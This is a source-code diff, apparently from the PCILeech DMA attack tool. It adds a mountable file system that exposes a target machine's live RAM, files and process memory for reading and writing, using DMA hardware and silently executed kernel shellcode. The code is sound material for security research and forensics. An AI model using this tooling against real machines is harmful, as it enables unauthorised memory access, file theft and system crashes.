+    qwSize = (BufferLength + qwBaseOffset + 0xfff) & ~0xfff;
+    if(qwBase >= pds->cbRAM[tp]) {
+        *ReadLength = 0;
+        return STATUS_FILE_INVALID;
+    }
+    if(qwBase + qwSize > pds->cbRAM[tp]) {
+        qwSize -= pds->cbRAM[tp] - qwBase;
+    }
+    if(qwSize > 0x01000000) {
+        qwSize = 0x01000000;
+    }
+    *ReadLength = (DWORD)min(BufferLength, qwSize - qwBaseOffset);
+    result = VfsCache_MemGet(tp, Buffer, Offset, *ReadLength, pds);
+    if(result) {
+        return STATUS_SUCCESS;
+    }
+    qwSize = CACHE_MEM_SIZE;
+    EnterCriticalSection(&pds->LockDma);
+    switch(tp) {
+        case VFS_RAM_TP_KMD:
+            qwCfgAddrMaxOrig = pds->ctx->cfg->qwAddrMax;    // TODO: REMOVE UGLY HACK WITH ADDRMAX...
+            pds->ctx->cfg->qwAddrMax = min(pds->cbRAM[tp], qwBase + qwSize);
+            result = Util_Read16M(pds->ctx, pds->pbDMA16M, qwBase, NULL);
+            pds->ctx->cfg->qwAddrMax = qwCfgAddrMaxOrig;
+            break;
+        case VFS_RAM_TP_NATIVE:
+            result = (0 != DeviceReadDMAEx(pds->ctx, qwBase, pds->pbDMA16M, 0x01000000, NULL, 0));
+            break;
+    }
+    memcpy(Buffer, pds->pbDMA16M + qwBaseOffset, *ReadLength);
+    VfsCache_MemPut(tp, pds->pbDMA16M, qwBase, pds);
+    LeaveCriticalSection(&pds->LockDma);
+    return STATUS_SUCCESS;
 }
 
 NTSTATUS _VfsReadFile_File(_In_ LPCWSTR wcsFileName, _Out_ LPVOID Buffer, _In_ DWORD BufferLength, _In_ LPDWORD ReadLength, _In_ LONGLONG Offset, _In_ PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	BOOL result;
-	VFS_OPERATION op;
-	PBYTE pbBufferDma = NULL;
-	QWORD cbBufferDma;
-	QWORD qwBaseOffset, qwBase, qwSize;
-	if(Vfs_IsFileInBlackList(wcsFileName, DokanFileInfo)) { return STATUS_ACCESS_DENIED; }
-	*ReadLength = BufferLength;
-	result = VfsCache_FileGet(wcsFileName, Offset, Buffer, BufferLength, pds);
-	if(result) {
-		return STATUS_SUCCESS; 
-	}
-	result = Vfs_InitVfsOperation(&op, VFS_OP_CMD_READ, wcsFileName, DokanFileInfo);
-	if(!result) { return STATUS_DATA_ERROR; }
-	qwBaseOffset = Offset % 0x00100000; // 1MB
-	qwBase = Offset - qwBaseOffset;
-	qwSize = (BufferLength + qwBaseOffset + 0x1fffff) & ~0x1fffff;
-	op.offset = qwBase;
-	op.cb = qwSize;
-	EnterCriticalSection(&pds->LockDma);
-	// TODO OP FIXES!
-	result = Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), &pbBufferDma, &cbBufferDma);
-	if(result && (qwBaseOffset <= cbBufferDma)) {
-		VfsCache_FilePut(wcsFileName, qwBase, pbBufferDma, cbBufferDma, pds);
-		*ReadLength = (DWORD)min(*ReadLength, cbBufferDma - qwBaseOffset);
-		memcpy(Buffer, pbBufferDma + qwBaseOffset, *ReadLength);
-		LocalFree(pbBufferDma);
-		LeaveCriticalSection(&pds->LockDma);
-		return STATUS_SUCCESS;
-	}
-	LeaveCriticalSection(&pds->LockDma);
-	return STATUS_DATA_ERROR;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    BOOL result;
+    VFS_OPERATION op;
+    PBYTE pbBufferDma = NULL;
+    QWORD cbBufferDma;
+    QWORD qwBaseOffset, qwBase, qwSize;
+    if(Vfs_IsFileInBlackList(wcsFileName, DokanFileInfo)) { return STATUS_ACCESS_DENIED; }
+    *ReadLength = BufferLength;
+    result = VfsCache_FileGet(wcsFileName, Offset, Buffer, BufferLength, pds);
+    if(result) {
+        return STATUS_SUCCESS; 
+    }
+    result = Vfs_InitVfsOperation(&op, VFS_OP_CMD_READ, wcsFileName, DokanFileInfo);
+    if(!result) { return STATUS_DATA_ERROR; }
+    qwBaseOffset = Offset % 0x00100000; // 1MB
+    qwBase = Offset - qwBaseOffset;
+    qwSize = (BufferLength + qwBaseOffset + 0x1fffff) & ~0x1fffff;
+    op.offset = qwBase;
+    op.cb = qwSize;
+    EnterCriticalSection(&pds->LockDma);
+    // TODO OP FIXES!
+    result = Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)&op, sizeof(VFS_OPERATION), &pbBufferDma, &cbBufferDma);
+    if(result && (qwBaseOffset <= cbBufferDma)) {
+        VfsCache_FilePut(wcsFileName, qwBase, pbBufferDma, cbBufferDma, pds);
+        *ReadLength = (DWORD)min(*ReadLength, cbBufferDma - qwBaseOffset);
+        memcpy(Buffer, pbBufferDma + qwBaseOffset, *ReadLength);
+        LocalFree(pbBufferDma);
+        LeaveCriticalSection(&pds->LockDma);
+        return STATUS_SUCCESS;
+    }
+    LeaveCriticalSection(&pds->LockDma);
+    return STATUS_DATA_ERROR;
 }
 
 NTSTATUS _VfsWriteFile_File(_In_ LPCWSTR wcsFileName, _In_ LPCVOID Buffer, _In_ DWORD NumberOfBytesToWrite, _In_ LPDWORD NumberOfBytesWritten, _In_ LONGLONG Offset, _In_ PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	BOOL result;
-	PVFS_OPERATION pop = NULL;
-	if(Vfs_IsFileInBlackList(wcsFileName, DokanFileInfo)) { return STATUS_ACCESS_DENIED; }
-	pop = (PVFS_OPERATION)LocalAlloc(LMEM_ZEROINIT, sizeof(VFS_OPERATION) + NumberOfBytesToWrite);
-	if(!pop) { return STATUS_MEMORY_NOT_ALLOCATED; }
-	result = Vfs_InitVfsOperation(pop, VFS_OP_CMD_WRITE, wcsFileName, DokanFileInfo);
-	pop->offset = (QWORD)Offset;
-	if(!result) { return STATUS_DATA_ERROR; }
-	if(DokanFileInfo->WriteToEndOfFile) { pop->flags |= VFS_FLAGS_APPEND_ON_WRITE; }
-	if(0 == Offset) {
-		pop->flags |= VFS_FLAGS_TRUNCATE_ON_WRITE; // TODO: find when to truncate and when not to... if 0th byte is written file is truncated now...
-	}
-	memcpy(pop->pb, Buffer, NumberOfBytesToWrite);
-	pop->cb = NumberOfBytesToWrite;
-	EnterCriticalSection(&pds->LockDma);
-	Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)pop, sizeof(VFS_OPERATION) + NumberOfBytesToWrite, NULL, NULL);
-	LeaveCriticalSection(&pds->LockDma);
-	VfsCache_FileDel(wcsFileName, Offset, NumberOfBytesToWrite, pds);
-	VfsCache_DirectoryDel(wcsFileName, DokanFileInfo, FALSE);
-	// TODO: UGLY BUT WORKS - PLEASE FIX THIS!!!
-	*NumberOfBytesWritten = NumberOfBytesToWrite;
-	LocalFree(pop);
-	return STATUS_SUCCESS;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    BOOL result;
+    PVFS_OPERATION pop = NULL;
+    if(Vfs_IsFileInBlackList(wcsFileName, DokanFileInfo)) { return STATUS_ACCESS_DENIED; }
+    pop = (PVFS_OPERATION)LocalAlloc(LMEM_ZEROINIT, sizeof(VFS_OPERATION) + NumberOfBytesToWrite);
+    if(!pop) { return STATUS_MEMORY_NOT_ALLOCATED; }
+    result = Vfs_InitVfsOperation(pop, VFS_OP_CMD_WRITE, wcsFileName, DokanFileInfo);
+    pop->offset = (QWORD)Offset;
+    if(!result) { return STATUS_DATA_ERROR; }
+    if(DokanFileInfo->WriteToEndOfFile) { pop->flags |= VFS_FLAGS_APPEND_ON_WRITE; }
+    if(0 == Offset) {
+        pop->flags |= VFS_FLAGS_TRUNCATE_ON_WRITE; // TODO: find when to truncate and when not to... if 0th byte is written file is truncated now...
+    }
+    memcpy(pop->pb, Buffer, NumberOfBytesToWrite);
+    pop->cb = NumberOfBytesToWrite;
+    EnterCriticalSection(&pds->LockDma);
+    Exec_ExecSilent(pds->ctx, pds->szNameVfsShellcode, (PBYTE)pop, sizeof(VFS_OPERATION) + NumberOfBytesToWrite, NULL, NULL);
+    LeaveCriticalSection(&pds->LockDma);
+    VfsCache_FileDel(wcsFileName, Offset, NumberOfBytesToWrite, pds);
+    VfsCache_DirectoryDel(wcsFileName, DokanFileInfo, FALSE);
+    // TODO: UGLY BUT WORKS - PLEASE FIX THIS!!!
+    *NumberOfBytesWritten = NumberOfBytesToWrite;
+    LocalFree(pop);
+    return STATUS_SUCCESS;
 }
 
 NTSTATUS DOKAN_CALLBACK
 VfsCallback_ReadFile(LPCWSTR wcsFileName, LPVOID Buffer, DWORD BufferLength, LPDWORD ReadLength, LONGLONG Offset, PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	if(!_wcsicmp(wcsFileName, L"\\liveram.raw")) { // ram dump file
-		return _VfsReadFile_RAM(Buffer, BufferLength, ReadLength, Offset, pds);
-	}
-	if(!_wcsnicmp(wcsFileName, L"\\files\\", 7)) {
-		return _VfsReadFile_File(wcsFileName, Buffer, BufferLength, ReadLength, Offset, DokanFileInfo);
-	}
-	return STATUS_FILE_INVALID;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    WCHAR wszProcBuffer[MAX_PATH];
+    BOOL result, fProcRoot, fProcName;
+    DWORD dwProcPID;
+    QWORD qwProcPath2;
+    LPWSTR wszProcPath1;
+    if(!_wcsicmp(wcsFileName, L"\\liveram-kmd.raw") && pds->cbRAM[VFS_RAM_TP_KMD]) { // kernel module backed RAM file
+        return _VfsReadFile_RAM(VFS_RAM_TP_KMD, Buffer, BufferLength, ReadLength, Offset, pds);
+    }
+    if(!_wcsicmp(wcsFileName, L"\\liveram-native.raw") && pds->cbRAM[VFS_RAM_TP_NATIVE]) { // kernel module backed RAM file
+        return _VfsReadFile_RAM(VFS_RAM_TP_NATIVE, Buffer, BufferLength, ReadLength, Offset, pds);
+    }
+    if(!_wcsnicmp(wcsFileName, L"\\files\\", 7) && pds->fKMD) {
+        return _VfsReadFile_File(wcsFileName, Buffer, BufferLength, ReadLength, Offset, DokanFileInfo);
+    }
+    if(pds->fVMM && (!_wcsnicmp(wcsFileName, L"\\proc\\name\\", 1) || !_wcsnicmp(wcsFileName, L"\\proc\\pid\\", 10))) {
+        wcsncpy_s(wszProcBuffer, MAX_PATH, wcsFileName, _TRUNCATE);
+        result = Vfs_UtilVmmGetPidDirFile(wszProcBuffer, &fProcRoot, &fProcName, &dwProcPID, &wszProcPath1, &qwProcPath2);
+        if(!result || fProcRoot) { return STATUS_FILE_INVALID; }
+        return VmmVfsReadFile(pds->ctx, dwProcPID, wszProcPath1, qwProcPath2, Buffer, BufferLength, ReadLength, Offset);
+    }
+    return STATUS_FILE_INVALID;
 }
 
 NTSTATUS DOKAN_CALLBACK
 VfsCallback_WriteFile(LPCWSTR wcsFileName, LPCVOID Buffer, DWORD NumberOfBytesToWrite, LPDWORD NumberOfBytesWritten, LONGLONG Offset, PDOKAN_FILE_INFO DokanFileInfo)
 {
-	PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
-	BOOL result;
-	if(!_wcsicmp(wcsFileName, L"\\liveram.raw")) { // ram dump file
-		EnterCriticalSection(&pds->LockDma);
-		result = DeviceWriteMEM(pds->ctx, Offset, (PBYTE)Buffer, NumberOfBytesToWrite, PCILEECH_MEM_FLAG_RETRYONFAIL);
-		LeaveCriticalSection(&pds->LockDma);
-		VfsCache_MemDel(Offset, NumberOfBytesToWrite, pds);
-		*NumberOfBytesWritten = NumberOfBytesToWrite;
-		return result ? STATUS_SUCCESS : STATUS_FILE_SYSTEM_LIMITATION;
-	}
-	if(!_wcsnicmp(wcsFileName, L"\\files\\", 7)) {
-		return _VfsWriteFile_File(wcsFileName, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten, Offset, DokanFileInfo);
-	}
-	return STATUS_FILE_INVALID;
+    PVFS_GLOBAL_STATE pds = (PVFS_GLOBAL_STATE)DokanFileInfo->DokanOptions->GlobalContext;
+    WCHAR wszProcBuffer[MAX_PATH];
+    BOOL result, fProcRoot, fProcName;
+    DWORD dwProcPID;
+    QWORD qwProcPath2;
+    LPWSTR wszProcPath1;
+    if(!_wcsicmp(wcsFileName, L"\\liveram-kmd.raw") && pds->cbRAM[VFS_RAM_TP_KMD]) { // kernel module backed RAM file
+        EnterCriticalSection(&pds->LockDma);
+        result = DeviceWriteMEM(pds->ctx, Offset, (PBYTE)Buffer, NumberOfBytesToWrite, PCILEECH_MEM_FLAG_RETRYONFAIL);
+        LeaveCriticalSection(&pds->LockDma);
+        VfsCache_MemDel(VFS_RAM_TP_KMD, Offset, NumberOfBytesToWrite, pds);
+        *NumberOfBytesWritten = NumberOfBytesToWrite;
+        return result ? STATUS_SUCCESS : STATUS_FILE_SYSTEM_LIMITATION;
+    }
+    if(!_wcsicmp(wcsFileName, L"\\liveram-native.raw") && pds->cbRAM[VFS_RAM_TP_NATIVE]) { // native DMA backed RAM file
+        EnterCriticalSection(&pds->LockDma);
+        result = DeviceWriteDMA(pds->ctx, Offset, (PBYTE)Buffer, NumberOfBytesToWrite, 0);
+        LeaveCriticalSection(&pds->LockDma);
+        VfsCache_MemDel(VFS_RAM_TP_NATIVE, Offset, NumberOfBytesToWrite, pds);
+        *NumberOfBytesWritten = NumberOfBytesToWrite;
+        return result ? STATUS_SUCCESS : STATUS_FILE_SYSTEM_LIMITATION;
+    }
+    if(!_wcsnicmp(wcsFileName, L"\\files\\", 7) && pds->fKMD) {
+        return _VfsWriteFile_File(wcsFileName, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten, Offset, DokanFileInfo);
+    }
+
+    if(pds->fVMM && (!_wcsnicmp(wcsFileName, L"\\proc\\name\\", 1) || !_wcsnicmp(wcsFileName, L"\\proc\\pid\\", 10))) {
+        wcsncpy_s(wszProcBuffer, MAX_PATH, wcsFileName, _TRUNCATE);
+        result = Vfs_UtilVmmGetPidDirFile(wszProcBuffer, &fProcRoot, &fProcName, &dwProcPID, &wszProcPath1, &qwProcPath2);
+        if(!result || fProcRoot) { return STATUS_FILE_INVALID; }
+        return VmmVfsWriteFile(pds->ctx, dwProcPID, wszProcPath1, qwProcPath2, (PBYTE)Buffer, NumberOfBytesToWrite, NumberOfBytesWritten, Offset);
+    }
+
+
+    return STATUS_FILE_INVALID;
 }
 
 NTSTATUS DOKAN_CALLBACK
 VfsCallback_DeleteFile(LPCWSTR wcsFileName, PDOKAN_FILE_INFO DokanFileInfo) {
-	Vfs_Delete(wcsFileName, DokanFileInfo);
-	return STATUS_SUCCESS;
+    Vfs_Delete(wcsFileName, DokanFileInfo);
+    return STATUS_SUCCESS;
 }
 
 VOID DOKAN_CALLBACK 
 VfsCallback_Cleanup(LPCWSTR wcsFileName, PDOKAN_FILE_INFO DokanFileInfo) {
-	if(DokanFileInfo->DeleteOnClose) {
-		if(!DokanFileInfo->IsDirectory) {
-			Vfs_Delete(wcsFileName, DokanFileInfo);
-		}
-	}
+    if(DokanFileInfo->DeleteOnClose) {
+        if(!DokanFileInfo->IsDirectory) {
+            Vfs_Delete(wcsFileName, DokanFileInfo);
+        }
+    }
 }
 
 VOID ActionMount(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	int status;
-	HMODULE hModuleDokan = NULL;
-	PVFS_GLOBAL_STATE pDokanState = NULL;
-	PDOKAN_OPTIONS pDokanOptions = NULL;
-	PDOKAN_OPERATIONS pDokanOperations = NULL;
-	WCHAR wszMountPoint[] = { 'K', ':', '\\', 0 };
-	int(*fnDokanMain)(PDOKAN_OPTIONS, PDOKAN_OPERATIONS);
-	// sanity checks
-	if(!ctx->phKMD) {
-		printf("MOUNT: Failed. Mounting the PCILeech File System requires an active kernel module (KMD).\n");
-		printf("Please use in conjunction with the -kmd option only.\n");
-		goto fail;
-	}
-	// allocate
-	hModuleDokan = LoadLibraryExA("dokan1.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
-	fnDokanMain = (int(*)(PDOKAN_OPTIONS, PDOKAN_OPERATIONS))GetProcAddress(hModuleDokan, "DokanMain");
-	if(!hModuleDokan || !fnDokanMain) {
-		printf("MOUNT: Failed. The required DOKANY file system library is not installed. \n");
-		printf("Please download from : https://github.com/dokan-dev/dokany/releases/latest\n");
-		goto fail;
-	}
-	pDokanState = (PVFS_GLOBAL_STATE)LocalAlloc(LMEM_ZEROINIT, sizeof(VFS_GLOBAL_STATE));
-	pDokanOptions = (PDOKAN_OPTIONS)LocalAlloc(LMEM_ZEROINIT, sizeof(DOKAN_OPTIONS));
-	pDokanOperations = (PDOKAN_OPERATIONS)LocalAlloc(LMEM_ZEROINIT, sizeof(DOKAN_OPERATIONS));
-	if(!pDokanState || !pDokanOptions || !pDokanOperations) {
-		printf("MOUNT: Failed (out of memory).");
-		goto fail;
-	}
-	// set global state
-	GetSystemTime(&pDokanState->time);
-	pDokanState->ctx = ctx;
-	pDokanState->cbRAM = ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].BaseAddress + ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].NumberOfBytes;
-	InitializeCriticalSection(&pDokanState->LockDma);
-	InitializeCriticalSection(&pDokanState->LockCache);
-	pDokanState->DokanNtStatusFromWin32 = (NTSTATUS(*)(DWORD))GetProcAddress(hModuleDokan, "DokanNtStatusFromWin32");
-	pDokanState->PCILeechOperatingSystem = ctx->pk->OperatingSystem;
-	if(pDokanState->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_WINDOWS) {
-		strcpy_s(pDokanState->szNameVfsShellcode, 32, "DEFAULT_WINX64_VFS_KSH");
-	} else if(pDokanState->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_LINUX) {
-		strcpy_s(pDokanState->szNameVfsShellcode, 32, "DEFAULT_LINUX_X64_VFS_KSH");
-	} else if(pDokanState->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_MACOS) {
-		strcpy_s(pDokanState->szNameVfsShellcode, 32, "DEFAULT_MACOS_VFS_KSH");
-	} else {
-		printf("MOUNT: Operating system not supported.\n");
-		goto fail;
-	}
-	// set options
-	pDokanOptions->Version = DOKAN_VERSION;
-	pDokanOptions->Options |= DOKAN_OPTION_NETWORK;
-	pDokanOptions->UNCName = L"\\\\PCILeech\\PCILeechFileSystem";
-	if((ctx->cfg->szInS[0] >= 'a' && ctx->cfg->szInS[0] <= 'z') || (ctx->cfg->szInS[0] >= 'A' && ctx->cfg->szInS[0] <= 'Z')) {
-		wszMountPoint[0] = ctx->cfg->szInS[0];
-	}
-	pDokanOptions->MountPoint = wszMountPoint;
-	pDokanOptions->GlobalContext = (ULONG64)pDokanState;
-	pDokanOptions->Timeout = 60000;
-	// set callbacks
-	pDokanOperations->ZwCreateFile = VfsCallback_CreateFile;
-	pDokanOperations->Cleanup = VfsCallback_Cleanup;
-	pDokanOperations->DeleteFileW = VfsCallback_DeleteFile;
-	pDokanOperations->GetFileInformation = VfsCallback_GetFileInformation;
-	pDokanOperations->FindFiles = VfsCallback_FindFiles;
-	pDokanOperations->ReadFile = VfsCallback_ReadFile;
-	pDokanOperations->WriteFile = VfsCallback_WriteFile;
-	// enable
-	printf(
-		"MOUNTING TARGET FILE SYSTEM - PLEASE READ IMPORTANT INFORMATION BELOW:         \n" \
-		"===============================================================================\n" \
-		"PCILeech file system mount is currently supported for: macOS, Windows and Linux\n" \
-		"There are limitations that are important to know, see below.   Use at own risk!\n" \
-		" - Create file: not implemented.                                               \n" \
-		" - Write to files may be buggy and may in rare cases corrupt the target file.  \n" \
-		" - Delete file will most often work, but with errors.                          \n" \
-		" - Delete directory, rename/move file and other features may not be supported. \n" \
-		" - Only the C:\\ drive is mounted on Windows target systems.                   \n" \
-		"===============================================================================\n" \
-		"The target system files are found in the files directory. The live memory (RAM)\n" \
-		"of the target system is mapped into the file: liveram.raw.  Writing to the live\n" \
-		"memory may crash the system. Use with care.                                    \n" \
-		"Copying files and dumping memory via the PCILeech virtual file system will work\n" \
-		"but the performance is better when using the built in commandline commands when\n" \
-		"dumping memory and/or transferring files.                                      \n" \
-		"===============================================================================\n");
-	printf("MOUNT: Mounting as drive %S\n", pDokanOptions->MountPoint);
-	if(ctx->cfg->fVerbose) {
-		pDokanState->Statistics.hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Vfs_StatisticsThread, &pDokanState->Statistics, 0, NULL);
-	}
-	status = fnDokanMain(pDokanOptions, pDokanOperations);
-	while(status == DOKAN_SUCCESS) {
-		printf("MOUNT: ReMounting as drive %S\n", pDokanOptions->MountPoint);
-		status = fnDokanMain(pDokanOptions, pDokanOperations);
-	}
-	printf("MOUNT: Failed. Status Code: %i\n", status);
-	DeleteCriticalSection(&pDokanState->LockDma);
-	DeleteCriticalSection(&pDokanState->LockCache);
+    int status;
+    HMODULE hModuleDokan = NULL;
+    PVFS_GLOBAL_STATE pDokanState = NULL;
+    PDOKAN_OPTIONS pDokanOptions = NULL;
+    PDOKAN_OPERATIONS pDokanOperations = NULL;
+    WCHAR wszMountPoint[] = { 'K', ':', '\\', 0 };
+    int(*fnDokanMain)(PDOKAN_OPTIONS, PDOKAN_OPERATIONS);
+    // sanity checks
+    if(!ctx->phKMD && ((ctx->cfg->dev.tp == PCILEECH_DEVICE_USB3380) || (ctx->cfg->qwAddrMax > 0x0000040000000000) || (ctx->cfg->qwAddrMax < 0x00400000))) {
+        printf(
+            "MOUNT: Failed. Please see below for possible reasons:               \n" \
+            "   - Mounting file system requires an active kernel module (KMD).   \n" \
+            "   - Mounting kernel backed RAM of target system requires a KMD.    \n" \
+            "   - Mounting native RAM of target system requires FPGA hardware    \n" \
+            "     and KMD or valid -max option set.                              \n" 
+        );
+        goto fail;
+    }
+    if(!ctx->phKMD) { printf("MOUNT: INFO: FILES folder not mounted. (No kernel module loaded).\n"); }
+    // allocate
+    hModuleDokan = LoadLibraryExA("dokan1.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
+    fnDokanMain = (int(*)(PDOKAN_OPTIONS, PDOKAN_OPERATIONS))GetProcAddress(hModuleDokan, "DokanMain");
+    if(!hModuleDokan || !fnDokanMain) {
+        printf("MOUNT: Failed. The required DOKANY file system library is not installed. \n");
+        printf("Please download from : https://github.com/dokan-dev/dokany/releases/latest\n");
+        goto fail;
+    }
+    pDokanState = (PVFS_GLOBAL_STATE)LocalAlloc(LMEM_ZEROINIT, sizeof(VFS_GLOBAL_STATE));
+    pDokanOptions = (PDOKAN_OPTIONS)LocalAlloc(LMEM_ZEROINIT, sizeof(DOKAN_OPTIONS));
+    pDokanOperations = (PDOKAN_OPERATIONS)LocalAlloc(LMEM_ZEROINIT, sizeof(DOKAN_OPERATIONS));
+    if(!pDokanState || !pDokanOptions || !pDokanOperations) {
+        printf("MOUNT: Failed (out of memory).\n");
+        goto fail;
+    }
+    // set global state
+    GetSystemTime(&pDokanState->time);
+    pDokanState->ctx = ctx;
+    pDokanState->fKMD = (ctx->phKMD != NULL);
+    pDokanState->cbRAM[VFS_RAM_TP_KMD] = pDokanState->fKMD ? (ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].BaseAddress + ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].NumberOfBytes) : 0;
+    pDokanState->cbRAM[VFS_RAM_TP_NATIVE] = (ctx->cfg->dev.tp == PCILEECH_DEVICE_USB3380) ? 0 : (pDokanState->fKMD ? pDokanState->cbRAM[VFS_RAM_TP_KMD] : ctx->cfg->qwAddrMax);
+    InitializeCriticalSection(&pDokanState->LockDma);
+    InitializeCriticalSection(&pDokanState->LockCache);
+    pDokanState->DokanNtStatusFromWin32 = (NTSTATUS(*)(DWORD))GetProcAddress(hModuleDokan, "DokanNtStatusFromWin32");
+    pDokanState->PCILeechOperatingSystem = pDokanState->fKMD ? ctx->pk->OperatingSystem : 0;
+    if(pDokanState->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_WINDOWS) {
+        strcpy_s(pDokanState->szNameVfsShellcode, 32, "DEFAULT_WINX64_VFS_KSH");
+    } else if(pDokanState->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_LINUX) {
+        strcpy_s(pDokanState->szNameVfsShellcode, 32, "DEFAULT_LINUX_X64_VFS_KSH");
+    } else if(pDokanState->PCILeechOperatingSystem == KMDDATA_OPERATING_SYSTEM_MACOS) {
+        strcpy_s(pDokanState->szNameVfsShellcode, 32, "DEFAULT_MACOS_VFS_KSH");
+    } else if(pDokanState->fKMD) {
+        printf("MOUNT: Operating system not supported.\n");
+        goto fail;
+    }
+    // initialize virtual memory manager (VMM) if possible
+    pDokanState->fVMM = VmmProcInitialize(ctx);
+    if(!pDokanState->fVMM) { printf("MOUNT: INFO: PROC file system not mounted.\n"); }
+    // set options
+    pDokanOptions->Version = DOKAN_VERSION;
+    pDokanOptions->Options |= DOKAN_OPTION_NETWORK;
+    pDokanOptions->UNCName = L"\\\\PCILeech\\PCILeechFileSystem";
+    if((ctx->cfg->szInS[0] >= 'a' && ctx->cfg->szInS[0] <= 'z') || (ctx->cfg->szInS[0] >= 'A' && ctx->cfg->szInS[0] <= 'Z')) {
+        wszMountPoint[0] = ctx->cfg->szInS[0];
+    }
+    pDokanOptions->MountPoint = wszMountPoint;
+    pDokanOptions->GlobalContext = (ULONG64)pDokanState;
+    pDokanOptions->Timeout = 60000;
+    // set callbacks
+    pDokanOperations->ZwCreateFile = VfsCallback_CreateFile;
+    pDokanOperations->Cleanup = VfsCallback_Cleanup;
+    pDokanOperations->DeleteFileW = VfsCallback_DeleteFile;
+    pDokanOperations->GetFileInformation = VfsCallback_GetFileInformation;
+    pDokanOperations->FindFiles = VfsCallback_FindFiles;
+    pDokanOperations->ReadFile = VfsCallback_ReadFile;
+    pDokanOperations->WriteFile = VfsCallback_WriteFile;
+    // enable
+    printf(
+        "MOUNTING PCILEECH FILE SYSTEM:                                                 \n" \
+        "===============================================================================\n");
+    if(pDokanState->fKMD) {
+        printf(
+            "PCILeech DMA attack target file system is mounted in the /files/ folder.       \n" \
+            "Please see limitations below:                                                  \n" \
+            " - Kernel module is required and is supported on: Windows, Linux and macOS.    \n" \
+            " - Create file: not implemented.                                               \n" \
+            " - Write to files may be buggy and may in rare cases corrupt the target file.  \n" \
+            " - Delete file will most often work, but with errors.                          \n" \
+            " - Delete directory, rename/move file and other features may not be supported. \n" \
+            " - Only the C:\\ drive is mounted on Windows target systems.                   \n" \
+            "===============================================================================\n");
+    }
+    if(pDokanState->fVMM) {
+        printf(
+            "PCILeech Memory Process File System is mounted in the /proc/ folder.           \n" \
+            "Memory from dump files or PCILeech hardware DMA devices is analyzed to provide \n" \
+            "a convenient process file system.                                              \n" \
+            " - File system is read-only when dump files are used.                          \n" \
+            " - File system is read-write when FPGA hardware acquisition devices are used.  \n" \
+            " - Full support exists for some x64 Windows operating systems.                 \n" \
+            " - Limited support for all other x64 operating systems.                        \n" \
+            "===============================================================================\n");
+    }
+    printf("MOUNT: Mounting as drive %S\n", pDokanOptions->MountPoint);
+    if(ctx->cfg->fVerbose) {
+        pDokanState->Statistics.hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Vfs_StatisticsThread, &pDokanState->Statistics, 0, NULL);
+    }
+    status = fnDokanMain(pDokanOptions, pDokanOperations);
+    while(status == DOKAN_SUCCESS) {
+        printf("MOUNT: ReMounting as drive %S\n", pDokanOptions->MountPoint);
+        status = fnDokanMain(pDokanOptions, pDokanOperations);
+    }
+    printf("MOUNT: Failed. Status Code: %i\n", status);
+    DeleteCriticalSection(&pDokanState->LockDma);
+    DeleteCriticalSection(&pDokanState->LockCache);
 fail:
-	if(pDokanState) {
-		pDokanState->Statistics.fThreadExit = TRUE;
-		Sleep(150);
-		LocalFree(pDokanState);
-	}
-	if(hModuleDokan) { FreeLibrary(hModuleDokan); }
-	if(pDokanOptions) { LocalFree(pDokanOptions); }
-	if(pDokanOperations) { LocalFree(pDokanOperations); }
+    if(pDokanState) {
+        pDokanState->Statistics.fThreadExit = TRUE;
+        Sleep(150);
+        LocalFree(pDokanState);
+    }
+    if(hModuleDokan) { FreeLibrary(hModuleDokan); }
+    if(pDokanOptions) { LocalFree(pDokanOptions); }
+    if(pDokanOperations) { LocalFree(pDokanOperations); }
 }
 
 #endif /* WIN32 */
@@ -945,7 +1090,7 @@ VOID ActionMount(_Inout_ PPCILEECH_CONTEXT ctx)
 
 VOID ActionMount(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	printf("MOUNT: Failed. Operation only supported in PCILeech for Windows.");
+    printf("MOUNT: Failed. Operation only supported in PCILeech for Windows.");
 }
 
 #endif /* LINUX || ANDROID */
diff --git a/pcileech/vfs.h b/pcileech/vfs.h
index 986db88..8dbdfdd 100644
--- a/pcileech/vfs.h
+++ b/pcileech/vfs.h
@@ -7,6 +7,26 @@
 #define __VFS_H__
 #include "pcileech.h"
 
+#define VFS_FLAGS_FILE_NORMAL           0x01
+#define VFS_FLAGS_FILE_DIRECTORY        0x02
+#define VFS_FLAGS_FILE_SYMLINK          0x04
+#define VFS_FLAGS_FILE_OTHER            0x08
+#define VFS_FLAGS_UNICODE               0x10
